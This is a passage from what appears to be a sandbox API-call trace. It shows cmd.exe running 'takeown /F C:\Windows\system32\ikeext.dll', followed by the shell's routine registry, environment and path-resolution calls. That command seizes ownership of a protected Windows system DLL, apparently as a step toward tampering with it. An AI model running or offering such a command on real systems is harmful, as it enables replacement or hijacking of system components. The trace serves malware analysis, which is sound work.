lpPerformanceCount=0x30fc6c | out: lpPerformanceCount=0x30fc6c*=314913169) returned 1 [0047.636] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0047.636] __set_app_type (_Type=0x1) [0047.636] __p__fmode () returned 0x768231f4 [0047.636] __p__commode () returned 0x768231fc [0047.636] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0047.636] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0047.636] GetCurrentThreadId () returned 0xba4 [0047.636] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba4) returned 0x38 [0047.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0047.636] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0047.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.636] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc04 | out: phkResult=0x30fc04*=0x0) returned 0x2 [0047.636] VirtualQuery (in: lpAddress=0x30fc3b, lpBuffer=0x30fbd4, dwLength=0x1c | out: lpBuffer=0x30fbd4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0047.636] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fbd4, dwLength=0x1c | out: lpBuffer=0x30fbd4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0047.636] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fbd4, dwLength=0x1c | out: lpBuffer=0x30fbd4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0047.637] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fbd4, dwLength=0x1c | out: lpBuffer=0x30fbd4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0047.637] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fbd4, dwLength=0x1c | out: lpBuffer=0x30fbd4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0047.637] GetConsoleOutputCP () returned 0x1b5 [0047.637] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.637] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0047.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.637] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0047.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.637] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0047.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.637] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.637] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.637] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0047.637] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.637] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0047.638] GetEnvironmentStringsW () returned 0xa0110* [0047.638] FreeEnvironmentStringsW (penv=0xa0110) returned 1 [0047.638] GetEnvironmentStringsW () returned 0xa0110* [0047.638] FreeEnvironmentStringsW (penv=0xa0110) returned 1 [0047.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb74 | out: phkResult=0x30eb74*=0x40) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0xc0, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x1, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0x1, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x0, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x40, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x40, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0x40, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.638] RegCloseKey (hKey=0x40) returned 0x0 [0047.638] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb74 | out: phkResult=0x30eb74*=0x40) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0x40, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x1, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0x1, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x0, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x9, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.638] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x4, lpData=0x30eb80*=0x9, lpcbData=0x30eb78*=0x4) returned 0x0 [0047.639] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb7c, lpData=0x30eb80, lpcbData=0x30eb78*=0x1000 | out: lpType=0x30eb7c*=0x0, lpData=0x30eb80*=0x9, lpcbData=0x30eb78*=0x1000) returned 0x2 [0047.639] RegCloseKey (hKey=0x40) returned 0x0 [0047.639] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa0f [0047.639] srand (_Seed=0x59ddfa0f) [0047.639] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"" [0047.639] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"" [0047.639] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.639] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1960, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0047.639] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0047.639] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.639] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0047.639] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0047.639] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0047.639] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0047.639] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0047.639] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0047.639] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0047.639] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0047.639] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0047.639] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0047.639] GetEnvironmentStringsW () returned 0xa23a0* [0047.640] FreeEnvironmentStringsW (penv=0xa23a0) returned 1 [0047.640] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.640] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0047.640] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0047.640] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0047.640] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0047.640] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0047.640] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0047.640] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0047.640] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0047.640] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0047.640] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f940 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x30f940, lpFilePart=0x30f93c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30f93c*="system32") returned 0x13 [0047.640] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0047.640] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x30f6bc | out: lpFindFileData=0x30f6bc) returned 0xa0940 [0047.640] FindClose (in: hFindFile=0xa0940 | out: hFindFile=0xa0940) returned 1 [0047.640] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x30f6bc | out: lpFindFileData=0x30f6bc) returned 0xa0940 [0047.640] FindClose (in: hFindFile=0xa0940 | out: hFindFile=0xa0940) returned 1 [0047.640] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0047.640] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0047.640] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0047.640] GetEnvironmentStringsW () returned 0xa0110* [0047.641] FreeEnvironmentStringsW (penv=0xa0110) returned 1 [0047.641] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.642] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0047.642] SetErrorMode (uMode=0x0) returned 0x8001 [0047.642] SetErrorMode (uMode=0x1) returned 0x0 [0047.643] GetFullPathNameW (in: lpFileName="takeown \\F C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x90868, lpFilePart=0x30f8b8 | out: lpBuffer="C:\\Windows\\system32\\takeown \\F C:\\Windows\\system32", lpFilePart=0x30f8b8*="system32") returned 0x32 [0047.643] SetErrorMode (uMode=0x8001) returned 0x1 [0047.643] NeedCurrentDirectoryForExePathW (ExeName="takeown \\F C:\\Windows\\system32\\.") returned 1 [0047.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.645] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.645] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown \\F C:\\Windows\\system32\\ikeext.dll", fInfoLevelId=0x1, lpFindFileData=0x30f654, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f654) returned 0xffffffff [0047.645] GetLastError () returned 0x7b [0047.645] GetConsoleOutputCP () returned 0x1b5 [0047.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.645] GetUserDefaultLCID () returned 0x409 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa80, cchData=128 | out: lpLCData="0") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa80, cchData=128 | out: lpLCData="0") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa80, cchData=128 | out: lpLCData="1") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0047.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0047.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0047.647] GetConsoleTitleW (in: lpConsoleTitle=0x90a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0047.647] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0047.647] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0047.647] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0047.648] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0047.648] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0047.648] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0047.648] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0047.648] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0047.648] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0047.648] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0047.649] GetConsoleTitleW (in: lpConsoleTitle=0x30f778, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.649] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0047.649] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0047.649] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0047.649] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0047.649] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0047.649] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0047.650] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0047.650] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0047.650] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0047.650] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0047.650] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0047.650] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0047.650] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0047.650] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0047.650] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0047.650] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0047.650] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0047.650] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0047.650] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0047.650] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0047.650] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0047.650] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0047.650] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0047.650] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0047.650] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0047.650] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0047.650] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0047.650] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0047.650] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0047.650] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0047.650] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0047.650] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0047.650] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0047.650] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0047.650] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0047.650] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0047.650] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0047.650] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0047.650] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0047.650] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0047.651] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0047.651] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0047.651] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0047.651] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0047.651] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0047.651] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0047.651] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0047.651] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0047.651] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0047.651] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0047.651] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0047.651] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0047.651] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0047.651] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0047.651] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0047.651] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0047.651] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0047.651] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0047.651] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0047.651] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0047.651] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0047.651] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0047.651] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0047.651] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0047.651] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0047.651] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0047.651] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0047.651] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0047.651] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0047.651] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0047.651] SetErrorMode (uMode=0x0) returned 0x8001 [0047.652] SetErrorMode (uMode=0x1) returned 0x0 [0047.652] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa1b78, lpFilePart=0x30f298 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30f298*="system32") returned 0x13 [0047.652] SetErrorMode (uMode=0x8001) returned 0x1 [0047.652] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0047.652] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.653] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x30f014, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f014) returned 0xa1e48 [0047.653] FindClose (in: hFindFile=0xa1e48 | out: hFindFile=0xa1e48) returned 1 [0047.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x30f014, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f014) returned 0xffffffff [0047.654] GetLastError () returned 0x2 [0047.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f014, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f014) returned 0xa1e48 [0047.654] FindClose (in: hFindFile=0xa1e48 | out: hFindFile=0xa1e48) returned 1 [0047.654] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0047.654] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0047.654] GetConsoleTitleW (in: lpConsoleTitle=0x30f50c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.654] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f394, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f45c | out: lpAttributeList=0x30f394, lpSize=0x30f45c) returned 1 [0047.654] UpdateProcThreadAttribute (in: lpAttributeList=0x30f394, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f454, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f394, lpPreviousValue=0x0) returned 1 [0047.654] GetStartupInfoW (in: lpStartupInfo=0x30f350 | out: lpStartupInfo=0x30f350*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", 